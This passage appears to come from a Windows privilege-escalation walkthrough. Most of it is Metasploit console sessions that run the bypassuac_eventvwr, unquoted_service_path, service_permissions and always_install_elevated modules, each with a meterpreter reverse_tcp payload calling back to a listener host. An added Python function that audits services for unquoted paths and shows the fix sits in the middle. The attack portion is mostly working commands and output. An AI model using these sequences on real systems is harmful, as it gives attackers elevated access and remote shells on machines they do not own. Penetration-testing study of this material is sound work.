   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.11.11    yes       The listen address (an interface may be specified)
   LPORT     6699             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf6 exploit(windows/local/bypassuac_eventvwr) > run
This module is a bit of black magic: it only works with an x86 payload and an x86 target.
2. unquoted_service_path module
msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/unquoted_service_path
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/unquoted_service_path) > run
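On the defensive side, the misconfiguration this module relies on can be audited from exported service ImagePath values. The following is an added example, not part of the original post or of Metasploit; the function names and the sample services are constructed for illustration.

```python
import re

# Constructed sample data (not from the original post): service name -> ImagePath
# as stored under HKLM\SYSTEM\CurrentControlSet\Services\<name>.
SAMPLE_SERVICES = {
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" -k run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "UnquotedSvc": r"C:\Program Files\Vendor App\bin\agent.exe /service",
    "DriverSvc": r"\SystemRoot\System32\drivers\example.sys",
}
EXE_END = re.compile(r"\.exe\b", re.IGNORECASE)

def split_command(image_path):
    """Split an ImagePath into (executable, arguments) at the first '.exe'."""
    match = EXE_END.search(image_path)
    if match is None:
        return None, image_path
    return image_path[:match.end()], image_path[match.end():]

def ambiguous_prefixes(image_path):
    """List the shorter paths Windows tries first when the path is unquoted.

    Each space in an unquoted executable path is a point where the name is
    cut and '.exe' appended; the folders holding these candidates must not be
    writable by non-administrators.
    """
    path = image_path.strip()
    exe, _ = split_command(path)
    if path.startswith('"') or exe is None or " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quoted_fix(image_path):
    """Return the ImagePath with the executable quoted (the remediation)."""
    path = image_path.strip()
    exe, args = split_command(path)
    if exe is None or path.startswith('"'):
        return path  # nothing to quote, or already quoted
    return f'"{exe}"{args}'

def audit(services):
    """Map each affected service to its ambiguous prefixes and corrected value."""
    findings = {}
    for name, image_path in services.items():
        prefixes = ambiguous_prefixes(image_path)
        if prefixes:
            findings[name] = {"prefixes": prefixes, "fix": quoted_fix(image_path)}
    return findings
```

Calling `audit(SAMPLE_SERVICES)` reports only `UnquotedSvc`, together with the quoted ImagePath that should replace the stored value.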
3. service_permissions module
msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/service_permissions) > set session 3
session => 3
msf6 exploit(windows/local/service_permissions) > run
No weak service was found.
4. always_install_elevated module
msf6 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/always_install_elevated
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/always_install_elevated) > set session 3
session => 3
msf6 exploit(windows/local/always_install_elevated) > run